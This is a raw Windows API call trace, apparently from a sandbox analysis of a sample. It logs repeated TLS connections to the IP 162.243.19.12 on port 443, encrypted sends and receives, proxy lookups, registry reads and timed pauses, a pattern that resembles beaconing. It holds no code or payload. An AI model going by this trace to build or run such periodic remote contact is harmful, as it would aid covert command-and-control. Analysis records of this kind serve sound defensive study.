	[0575.505] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x233fc681af0
	[0575.505] CertAddCRLLinkToStore (in: hCertStore=0x233fc681af0, pCrlContext=0x233fc67f430, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0575.505] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x233fc67f430, pTime=0x350199b4c8, hAdditionalStore=0x233fc681af0, pChainPara=0x350199b4d0, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x350199b4c0 | out: ppChainContext=0x350199b4c0) returned 1
	[0575.507] CertDuplicateCertificateChain (pChainContext=0x233fc6ff290) returned 0x233fc6ff290
	[0575.509] CertDuplicateCertificateContext (pCertContext=0x233fc67f430) returned 0x233fc67f430
	[0575.509] CertDuplicateCertificateContext (pCertContext=0x233fc67ff30) returned 0x233fc67ff30
	[0575.511] CertDuplicateCertificateContext (pCertContext=0x233fc680030) returned 0x233fc680030
	[0575.511] CertFreeCertificateChain (pChainContext=0x233fc6ff290) 
	[0575.511] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x233fc6ff290, pPolicyPara=0x350199b648, pPolicyStatus=0x350199b628 | out: pPolicyStatus=0x350199b628) returned 1
	[0575.511] SetLastError (dwErrCode=0x0) 
	[0575.511] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x233fc6ff290, pPolicyPara=0x350199b720, pPolicyStatus=0x350199b708 | out: pPolicyStatus=0x350199b708) returned 1
	[0575.511] CertFreeCertificateChain (pChainContext=0x233fc6ff290) 
	[0575.511] CertFreeCertificateContext (pCertContext=0x233fc67f430) returned 1
	[0575.512] EncryptMessage (in: phContext=0x350199b900, fQOP=0x0, pMessage=0x233e491f3d8, MessageSeqNo=0x0 | out: pMessage=0x233e491f3d8) returned 0x0
	[0575.512] CoTaskMemAlloc (cb=0x20) returned 0x233fc64fe40
	[0575.512] WSASend (in: s=0x7cc, lpBuffers=0x233fc64fe40*=((len=0x3b, buf=0x233e491c698*), (len=0xd5, buf=0x233e491f1e0*)), dwBufferCount=0x2, lpNumberOfBytesSent=0x350199ba68, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x233fc64fe40*=((len=0x3b, buf=0x233e491c698*), (len=0xd5, buf=0x233e491f1e0*)), lpNumberOfBytesSent=0x350199ba68*=0x110, lpOverlapped=0x0) returned 0
	[0575.512] CoTaskMemFree (pv=0x233fc64fe40) 
	[0575.512] setsockopt (s=0x7cc, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0575.516] recv (in: s=0x7cc, buf=0x233e491f580, len=5, flags=0 | out: buf=0x233e491f580*) returned 5
	[0576.041] recv (in: s=0x7cc, buf=0x233e491f5a5, len=1488, flags=0 | out: buf=0x233e491f5a5*) returned 1488
	[0576.041] DecryptMessage (in: phContext=0x350199b5f0, pMessage=0x233e491fc88, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x233e491fc88, pfQOP=0x0) returned 0x0
	[0576.042] setsockopt (s=0x7cc, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0576.042] SetEvent (hEvent=0x6b4) returned 1
	[0576.071] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x25c
	[0595.075] CloseHandle (hObject=0x25c) returned 1
	[0595.533] strlen (_Str="Inherited") returned 0x9
	[0595.537] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x350199c400 | out: phkResult=0x350199c400*=0x25c) returned 0x0
	[0595.538] RegOpenKeyExW (in: hKey=0x25c, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c2e8 | out: phkResult=0x350199c2e8*=0x9c8) returned 0x0
	[0595.538] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x164
	[0595.538] RegNotifyChangeKeyValue (hKey=0x9c8, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x164, fAsynchronous=1) returned 0x0
	[0595.539] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0xa64) returned 0x0
	[0595.539] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3c4
	[0595.539] RegNotifyChangeKeyValue (hKey=0xa64, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x3c4, fAsynchronous=1) returned 0x0
	[0595.540] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0xa80) returned 0x0
	[0595.541] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa5c
	[0595.541] RegNotifyChangeKeyValue (hKey=0xa80, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xa5c, fAsynchronous=1) returned 0x0
	[0595.541] GetCurrentProcess () returned 0xffffffffffffffff
	[0595.541] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199c278 | out: TokenHandle=0x350199c278*=0xa70) returned 1
	[0595.542] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x233fc68c3e0
	[0595.542] WinHttpSetTimeouts (hInternet=0x233fc68c3e0, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0595.542] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x350199c358 | out: pProxyConfig=0x350199c358) returned 1
	[0595.562] SetEvent (hEvent=0x6b4) returned 1
	[0595.562] select (in: nfds=0, readfds=0x233e4927680, writefds=0x0, exceptfds=0x0, timeout=0x350199c010 | out: readfds=0x233e4927680, writefds=0x0, exceptfds=0x0) returned 1
	[0595.563] QueryContextAttributesW (in: phContext=0x350199bea0, ulAttribute=0x1a, pBuffer=0x350199c020 | out: pBuffer=0x350199c020) returned 0x0
	[0595.564] DeleteSecurityContext (phContext=0x350199b670) returned 0x0
	[0595.566] shutdown (s=0x7cc, how=2) returned 0
	[0595.572] setsockopt (s=0x7cc, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0595.572] closesocket (s=0x7cc) returned 0
	[0595.573] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7cc
	[0595.574] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x9bc
	[0595.574] WSAConnect (in: s=0x7cc, name=0x233e4928e18*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0595.684] closesocket (s=0x9bc) returned 0
	[0595.686] InitializeSecurityContextW (in: phCredential=0x350199b600, phContext=0x0, pTargetName=0x233e4925dc0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x350199b5f0, pOutput=0x233e49296a0, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0 | out: phNewContext=0x350199b5f0, pOutput=0x233e49296a0, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0) returned 0x90312
	[0595.687] FreeContextBuffer (in: pvContextBuffer=0x233fc687000 | out: pvContextBuffer=0x233fc687000) returned 0x0
	[0595.687] send (in: s=0x7cc, buf=0x233e4929770*, len=333, flags=0 | out: buf=0x233e4929770*) returned 333
	[0595.691] recv (in: s=0x7cc, buf=0x233e4929770, len=5, flags=0 | out: buf=0x233e4929770*) returned 5
	[0595.804] recv (in: s=0x7cc, buf=0x233e4929775, len=49, flags=0 | out: buf=0x233e4929775*) returned 49
	[0595.804] InitializeSecurityContextW (in: phCredential=0x350199b530, phContext=0x350199b7e0, pTargetName=0x233e4925dc0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e49299b0, Reserved2=0x0, phNewContext=0x350199b520, pOutput=0x233e49299d0, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510 | out: phNewContext=0x350199b520, pOutput=0x233e49299d0, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510) returned 0x90312
	[0595.804] recv (in: s=0x7cc, buf=0x233e4929ac0, len=5, flags=0 | out: buf=0x233e4929ac0*) returned 5
	[0595.804] recv (in: s=0x7cc, buf=0x233e4929ae5, len=1, flags=0 | out: buf=0x233e4929ae5*) returned 1
	[0595.804] InitializeSecurityContextW (in: phCredential=0x350199b470, phContext=0x350199b720, pTargetName=0x233e4925dc0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e4929bb8, Reserved2=0x0, phNewContext=0x350199b460, pOutput=0x233e4929bd8, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450 | out: phNewContext=0x350199b460, pOutput=0x233e4929bd8, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450) returned 0x90312
	[0595.805] recv (in: s=0x7cc, buf=0x233e4929cc8, len=5, flags=0 | out: buf=0x233e4929cc8*) returned 5
	[0595.805] recv (in: s=0x7cc, buf=0x233e4929ced, len=48, flags=0 | out: buf=0x233e4929ced*) returned 48
	[0595.805] InitializeSecurityContextW (in: phCredential=0x350199b3b0, phContext=0x350199b660, pTargetName=0x233e4925dc0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e4929df0, Reserved2=0x0, phNewContext=0x350199b3a0, pOutput=0x233e4929e10, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390 | out: phNewContext=0x350199b3a0, pOutput=0x233e4929e10, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390) returned 0x0
	[0595.808] FreeContextBuffer (in: pvContextBuffer=0x233e399bfe0 | out: pvContextBuffer=0x233e399bfe0) returned 0x0
	[0595.809] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x4, pBuffer=0x233e4929f58 | out: pBuffer=0x233e4929f58) returned 0x0
	[0595.809] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x5a, pBuffer=0x233e4929fb0 | out: pBuffer=0x233e4929fb0) returned 0x0
	[0595.810] QueryContextAttributesW (in: phContext=0x350199b4c0, ulAttribute=0x53, pBuffer=0x233e492a018 | out: pBuffer=0x233e492a018) returned 0x0
	[0595.810] CertDuplicateCertificateContext (pCertContext=0x233fc67f430) returned 0x233fc67f430
	[0595.811] CertDuplicateStore (hCertStore=0x233fc683420) returned 0x233fc683420
	[0595.811] CertEnumCertificatesInStore (hCertStore=0x233fc683420, pPrevCertContext=0x0) returned 0x233fc67f430
	[0595.811] CertDuplicateCertificateContext (pCertContext=0x233fc67f430) returned 0x233fc67f430
	[0595.811] CertEnumCertificatesInStore (hCertStore=0x233fc683420, pPrevCertContext=0x233fc67f430) returned 0x0
	[0595.812] CertCloseStore (hCertStore=0x233fc683420, dwFlags=0x0) returned 1
	[0595.812] CertFreeCertificateContext (pCertContext=0x233fc67f430) returned 1
	[0595.814] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x233fc6830e0
	[0595.814] CertAddCRLLinkToStore (in: hCertStore=0x233fc6830e0, pCrlContext=0x233fc67f430, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0595.815] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x233fc67f430, pTime=0x350199b4c8, hAdditionalStore=0x233fc6830e0, pChainPara=0x350199b4d0, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x350199b4c0 | out: ppChainContext=0x350199b4c0) returned 1
	[0595.816] CertDuplicateCertificateChain (pChainContext=0x233fc6fe810) returned 0x233fc6fe810
	[0595.818] CertDuplicateCertificateContext (pCertContext=0x233fc67f430) returned 0x233fc67f430
	[0595.818] CertDuplicateCertificateContext (pCertContext=0x233fc67ff30) returned 0x233fc67ff30
	[0595.819] CertDuplicateCertificateContext (pCertContext=0x233fc680030) returned 0x233fc680030
	[0595.819] CertFreeCertificateChain (pChainContext=0x233fc6fe810) 
	[0595.819] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x233fc6fe810, pPolicyPara=0x350199b648, pPolicyStatus=0x350199b628 | out: pPolicyStatus=0x350199b628) returned 1
	[0595.819] SetLastError (dwErrCode=0x0) 
	[0595.819] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x233fc6fe810, pPolicyPara=0x350199b720, pPolicyStatus=0x350199b708 | out: pPolicyStatus=0x350199b708) returned 1
	[0595.820] CertFreeCertificateChain (pChainContext=0x233fc6fe810) 
	[0595.820] CertFreeCertificateContext (pCertContext=0x233fc67f430) returned 1
	[0595.820] EncryptMessage (in: phContext=0x350199b900, fQOP=0x0, pMessage=0x233e492cc20, MessageSeqNo=0x0 | out: pMessage=0x233e492cc20) returned 0x0
	[0595.821] CoTaskMemAlloc (cb=0x20) returned 0x233fc64fa80
	[0595.821] WSASend (in: s=0x7cc, lpBuffers=0x233fc64fa80*=((len=0x3b, buf=0x233e4929ee0*), (len=0xd5, buf=0x233e492ca28*)), dwBufferCount=0x2, lpNumberOfBytesSent=0x350199ba68, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x233fc64fa80*=((len=0x3b, buf=0x233e4929ee0*), (len=0xd5, buf=0x233e492ca28*)), lpNumberOfBytesSent=0x350199ba68*=0x110, lpOverlapped=0x0) returned 0
	[0595.821] CoTaskMemFree (pv=0x233fc64fa80) 
	[0595.821] setsockopt (s=0x7cc, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0595.821] recv (in: s=0x7cc, buf=0x233e492cdc8, len=5, flags=0 | out: buf=0x233e492cdc8*) returned 5
	[0596.273] recv (in: s=0x7cc, buf=0x233e492cded, len=1488, flags=0 | out: buf=0x233e492cded*) returned 1488
	[0596.274] DecryptMessage (in: phContext=0x350199b5f0, pMessage=0x233e492d4d0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x233e492d4d0, pfQOP=0x0) returned 0x0
	[0596.274] setsockopt (s=0x7cc, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0596.275] SetEvent (hEvent=0x6b4) returned 1
	[0596.305] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x25c
	[0608.312] CloseHandle (hObject=0x25c) returned 1
	[0608.912] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x350199c400 | out: phkResult=0x350199c400*=0x25c) returned 0x0
	[0608.912] RegOpenKeyExW (in: hKey=0x25c, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c2e8 | out: phkResult=0x350199c2e8*=0x9c8) returned 0x0
	[0608.913] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x164
	[0608.913] RegNotifyChangeKeyValue (hKey=0x9c8, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x164, fAsynchronous=1) returned 0x0
	[0608.914] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0xa64) returned 0x0
	[0608.914] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3c4
	[0608.914] RegNotifyChangeKeyValue (hKey=0xa64, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x3c4, fAsynchronous=1) returned 0x0
	[0608.916] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0xa80) returned 0x0
	[0608.916] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa5c
	[0608.917] RegNotifyChangeKeyValue (hKey=0xa80, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xa5c, fAsynchronous=1) returned 0x0
	[0608.917] GetCurrentProcess () returned 0xffffffffffffffff
	[0608.917] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199c278 | out: TokenHandle=0x350199c278*=0xa70) returned 1
	[0608.918] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x233fc68b720
	[0608.918] WinHttpSetTimeouts (hInternet=0x233fc68b720, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0608.919] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x350199c358 | out: pProxyConfig=0x350199c358) returned 1
	[0608.942] SetEvent (hEvent=0x6b4) returned 1
	[0608.943] select (in: nfds=0, readfds=0x233e4934ec8, writefds=0x0, exceptfds=0x0, timeout=0x350199c010 | out: readfds=0x233e4934ec8, writefds=0x0, exceptfds=0x0) returned 1
	[0608.943] QueryContextAttributesW (in: phContext=0x350199bea0, ulAttribute=0x1a, pBuffer=0x350199c020 | out: pBuffer=0x350199c020) returned 0x0
	[0608.946] DeleteSecurityContext (phContext=0x350199b670) returned 0x0
	[0608.948] shutdown (s=0x7cc, how=2) returned 0
	[0608.950] setsockopt (s=0x7cc, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0608.950] closesocket (s=0x7cc) returned 0
	[0608.951] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7cc
	[0608.952] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x9bc
	[0608.953] WSAConnect (in: s=0x7cc, name=0x233e4936660*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0609.061] closesocket (s=0x9bc) returned 0
	[0609.063] InitializeSecurityContextW (in: phCredential=0x350199b600, phContext=0x0, pTargetName=0x233e4933608, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x350199b5f0, pOutput=0x233e4936ee8, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0 | out: phNewContext=0x350199b5f0, pOutput=0x233e4936ee8, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0) returned 0x90312
	[0609.064] FreeContextBuffer (in: pvContextBuffer=0x233fc686d20 | out: pvContextBuffer=0x233fc686d20) returned 0x0
	[0609.064] send (in: s=0x7cc, buf=0x233e4936fb8*, len=333, flags=0 | out: buf=0x233e4936fb8*) returned 333
	[0609.065] recv (in: s=0x7cc, buf=0x233e4936fb8, len=5, flags=0 | out: buf=0x233e4936fb8*) returned 5
	[0609.181] recv (in: s=0x7cc, buf=0x233e4936fbd, len=49, flags=0 | out: buf=0x233e4936fbd*) returned 49
	[0609.181] InitializeSecurityContextW (in: phCredential=0x350199b530, phContext=0x350199b7e0, pTargetName=0x233e4933608, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e49371f8, Reserved2=0x0, phNewContext=0x350199b520, pOutput=0x233e4937218, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510 | out: phNewContext=0x350199b520, pOutput=0x233e4937218, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510) returned 0x90312
	[0609.185] recv (in: s=0x7cc, buf=0x233e4937308, len=5, flags=0 | out: buf=0x233e4937308*) returned 5
	[0609.185] recv (in: s=0x7cc, buf=0x233e493732d, len=1, flags=0 | out: buf=0x233e493732d*) returned 1
	[0609.185] InitializeSecurityContextW (in: phCredential=0x350199b470, phContext=0x350199b720, pTargetName=0x233e4933608, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e4937400, Reserved2=0x0, phNewContext=0x350199b460, pOutput=0x233e4937420, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450 | out: phNewContext=0x350199b460, pOutput=0x233e4937420, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450) returned 0x90312
	[0609.186] recv (in: s=0x7cc, buf=0x233e4937510, len=5, flags=0 | out: buf=0x233e4937510*) returned 5
	[0609.186] recv (in: s=0x7cc, buf=0x233e4937535, len=48, flags=0 | out: buf=0x233e4937535*) returned 48
	[0609.186] InitializeSecurityContextW (in: phCredential=0x350199b3b0, phContext=0x350199b660, pTargetName=0x233e4933608, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e4937638, Reserved2=0x0, phNewContext=0x350199b3a0, pOutput=0x233e4937658, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390 | out: phNewContext=0x350199b3a0, pOutput=0x233e4937658, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390) returned 0x0
	[0609.190] FreeContextBuffer (in: pvContextBuffer=0x233e399bc80 | out: pvContextBuffer=0x233e399bc80) returned 0x0
	[0609.191] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x4, pBuffer=0x233e49377a0 | out: pBuffer=0x233e49377a0) returned 0x0
	[0609.191] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x5a, pBuffer=0x233e49377f8 | out: pBuffer=0x233e49377f8) returned 0x0
	[0609.192] QueryContextAttributesW (in: phContext=0x350199b4c0, ulAttribute=0x53, pBuffer=0x233e4937860 | out: pBuffer=0x233e4937860) returned 0x0
	[0609.193] CertDuplicateCertificateContext (pCertContext=0x233fc680bb0) returned 0x233fc680bb0
	[0609.193] CertDuplicateStore (hCertStore=0x233fc681e30) returned 0x233fc681e30
	[0609.193] CertEnumCertificatesInStore (hCertStore=0x233fc681e30, pPrevCertContext=0x0) returned 0x233fc680bb0
	[0609.193] CertDuplicateCertificateContext (pCertContext=0x233fc680bb0) returned 0x233fc680bb0
	[0609.193] CertEnumCertificatesInStore (hCertStore=0x233fc681e30, pPrevCertContext=0x233fc680bb0) returned 0x0
	[0609.194] CertCloseStore (hCertStore=0x233fc681e30, dwFlags=0x0) returned 1
	[0609.194] CertFreeCertificateContext (pCertContext=0x233fc680bb0) returned 1
	[0609.196] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x233fc681c90
	[0609.196] CertAddCRLLinkToStore (in: hCertStore=0x233fc681c90, pCrlContext=0x233fc680bb0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0609.197] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x233fc680bb0, pTime=0x350199b4c8, hAdditionalStore=0x233fc681c90, pChainPara=0x350199b4d0, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x350199b4c0 | out: ppChainContext=0x350199b4c0) returned 1
	[0609.199] CertDuplicateCertificateChain (pChainContext=0x233fc6feb10) returned 0x233fc6feb10
	[0609.201] CertDuplicateCertificateContext (pCertContext=0x233fc680bb0) returned 0x233fc680bb0
	[0609.201] CertDuplicateCertificateContext (pCertContext=0x233fc67ff30) returned 0x233fc67ff30
	[0609.202] CertDuplicateCertificateContext (pCertContext=0x233fc680030) returned 0x233fc680030
	[0609.202] CertFreeCertificateChain (pChainContext=0x233fc6feb10) 
	[0609.202] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x233fc6feb10, pPolicyPara=0x350199b648, pPolicyStatus=0x350199b628 | out: pPolicyStatus=0x350199b628) returned 1
	[0609.202] SetLastError (dwErrCode=0x0) 
	[0609.203] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x233fc6feb10, pPolicyPara=0x350199b720, pPolicyStatus=0x350199b708 | out: pPolicyStatus=0x350199b708) returned 1
	[0609.204] CertFreeCertificateChain (pChainContext=0x233fc6feb10) 
	[0609.204] CertFreeCertificateContext (pCertContext=0x233fc680bb0) returned 1
	[0609.205] EncryptMessage (in: phContext=0x350199b900, fQOP=0x0, pMessage=0x233e493a468, MessageSeqNo=0x0 | out: pMessage=0x233e493a468) returned 0x0
	[0609.205] CoTaskMemAlloc (cb=0x20) returned 0x233fc650110
	[0609.205] WSASend (in: s=0x7cc, lpBuffers=0x233fc650110*=((len=0x3b, buf=0x233e4937728*), (len=0xd5, buf=0x233e493a270*)), dwBufferCount=0x2, lpNumberOfBytesSent=0x350199ba68, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x233fc650110*=((len=0x3b, buf=0x233e4937728*), (len=0xd5, buf=0x233e493a270*)), lpNumberOfBytesSent=0x350199ba68*=0x110, lpOverlapped=0x0) returned 0
	[0609.206] CoTaskMemFree (pv=0x233fc650110) 
	[0609.206] setsockopt (s=0x7cc, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0609.207] recv (in: s=0x7cc, buf=0x233e493a610, len=5, flags=0 | out: buf=0x233e493a610*) returned 5
	[0609.703] recv (in: s=0x7cc, buf=0x233e493a635, len=1488, flags=0 | out: buf=0x233e493a635*) returned 1488
	[0609.703] DecryptMessage (in: phContext=0x350199b5f0, pMessage=0x233e493ad18, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x233e493ad18, pfQOP=0x0) returned 0x0
	[0609.703] setsockopt (s=0x7cc, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0609.703] SetEvent (hEvent=0x6b4) returned 1
	[0609.756] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x25c
	[0618.760] CloseHandle (hObject=0x25c) returned 1
	[0619.221] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x350199c400 | out: phkResult=0x350199c400*=0x25c) returned 0x0
	[0619.249] RegOpenKeyExW (in: hKey=0x25c, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c2e8 | out: phkResult=0x350199c2e8*=0x9c8) returned 0x0
	[0619.249] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x164
	[0619.249] RegNotifyChangeKeyValue (hKey=0x9c8, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x164, fAsynchronous=1) returned 0x0
	[0619.250] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0xa64) returned 0x0
	[0619.251] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3c4
	[0619.251] RegNotifyChangeKeyValue (hKey=0xa64, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x3c4, fAsynchronous=1) returned 0x0
	[0619.253] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0xa80) returned 0x0
	[0619.253] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa5c
	[0619.253] RegNotifyChangeKeyValue (hKey=0xa80, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xa5c, fAsynchronous=1) returned 0x0
	[0619.253] GetCurrentProcess () returned 0xffffffffffffffff
	[0619.253] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199c278 | out: TokenHandle=0x350199c278*=0xa70) returned 1
	[0619.254] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x233fc68bb60
	[0619.255] WinHttpSetTimeouts (hInternet=0x233fc68bb60, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0619.255] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x350199c358 | out: pProxyConfig=0x350199c358) returned 1
	[0619.278] SetEvent (hEvent=0x6b4) returned 1
	[0619.278] select (in: nfds=0, readfds=0x233e4942710, writefds=0x0, exceptfds=0x0, timeout=0x350199c010 | out: readfds=0x233e4942710, writefds=0x0, exceptfds=0x0) returned 1
	[0619.279] QueryContextAttributesW (in: phContext=0x350199bea0, ulAttribute=0x1a, pBuffer=0x350199c020 | out: pBuffer=0x350199c020) returned 0x0
	[0619.281] DeleteSecurityContext (phContext=0x350199b670) returned 0x0
